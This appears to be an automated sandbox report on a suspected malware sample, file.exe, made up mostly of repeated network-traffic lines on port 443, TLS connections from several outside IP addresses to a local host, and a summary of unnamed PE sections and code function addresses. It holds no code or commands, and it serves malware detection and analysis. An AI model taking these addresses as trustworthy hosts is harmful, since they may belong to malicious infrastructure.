          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50095 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
          Source: unknownNetwork traffic detected: HTTP traffic on port 50084 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
          Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
          Source: unknownNetwork traffic detected: HTTP traffic on port 50038 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50110 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
          Source: unknownNetwork traffic detected: HTTP traffic on port 50083 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
          Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
          Source: unknownNetwork traffic detected: HTTP traffic on port 50016 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
          Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50109 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50027 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
          Source: unknownNetwork traffic detected: HTTP traffic on port 50036 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50116 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50059 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50094 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50071 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50106
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50105
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50108
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50107
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50060 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50109
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50100
          Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50102
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50104
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50103
          Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50117
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50116
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50119
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50118
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50111
          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50110
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50113
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50112
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50115
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50114
          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50037 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
          Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50120
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 50093 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50082 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50105 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50106 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50081 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50117 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50070 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50118 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50092 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50069 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50054
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50053
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50056
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50055
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50057
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50059
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50022 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50061
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50060
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50063
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50062
          Source: unknownNetwork traffic detected: HTTP traffic on port 50068 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50102 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50065
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50064
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50067
          Source: unknownNetwork traffic detected: HTTP traffic on port 50091 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50113 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50056 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50066
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50069
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50068
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50070
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50072
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50071
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50074
          Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50073
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50080 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50034 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50076
          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50075
          Source: unknownNetwork traffic detected: HTTP traffic on port 50057 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50078
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50077
          Source: unknownNetwork traffic detected: HTTP traffic on port 50114 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50079
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50081
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50080
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50083
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50082
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50085
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50084
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50087
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50086
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50089
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50088
          Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50079 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50090
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50092
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50091
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50094
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50093
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50096
          Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50095
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50032 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
          Source: unknownNetwork traffic detected: HTTP traffic on port 50055 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
          Source: unknownNetwork traffic detected: HTTP traffic on port 50090 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
          Source: unknownNetwork traffic detected: HTTP traffic on port 50078 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
          Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50029
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50028
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50022
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50030
          Source: unknownNetwork traffic detected: HTTP traffic on port 50067 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50103 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50039
          Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50032
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50034
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50033
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50036
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50035
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50038
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50037
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50041
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50040
          Source: unknownNetwork traffic detected: HTTP traffic on port 50066 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50104 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50089 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50043
          Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
          Source: unknownNetwork traffic detected: HTTP traffic on port 50115 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50047
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50046
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50049
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50048
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50052
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50051
          Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50053 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50076 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50099 -> 443
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.7:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49717 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49729 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49736 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.7:49756 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.7:49816 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.30.17.174:443 -> 192.168.2.7:49827 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.7:49943 version: TLS 1.2

          System Summary

          barindex
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013796380_3_01379638
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013490220_3_01349022
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0134DE2A0_3_0134DE2A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0135480F0_3_0135480F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01349F4C0_3_01349F4C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_013796380_3_01379638
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065CE65E0_2_065CE65E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06596E780_2_06596E78
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065CB67B0_2_065CB67B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C3E610_2_065C3E61
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D5E1E0_2_065D5E1E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B16090_2_065B1609
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C4E0F0_2_065C4E0F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B5EDA0_2_065B5EDA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B56D30_2_065B56D3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A36CB0_2_065A36CB
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659F6C00_2_0659F6C0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659C6E30_2_0659C6E3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065D0EE60_2_065D0EE6
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B6EAF0_2_065B6EAF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B86A20_2_065B86A2
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B1EA60_2_065B1EA6
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065A3F4A0_2_065A3F4A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B7F4B0_2_065B7F4B
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BE74F0_2_065BE74F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065AD7700_2_065AD770
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065CAF710_2_065CAF71
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C07650_2_065C0765
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065AEF120_2_065AEF12
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065B2F380_2_065B2F38
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065AC7DA0_2_065AC7DA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C3FD30_2_065C3FD3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0659A7CC0_2_0659A7CC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065BAFC20_2_065BAFC2
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_065C57C50_2_065C57C5
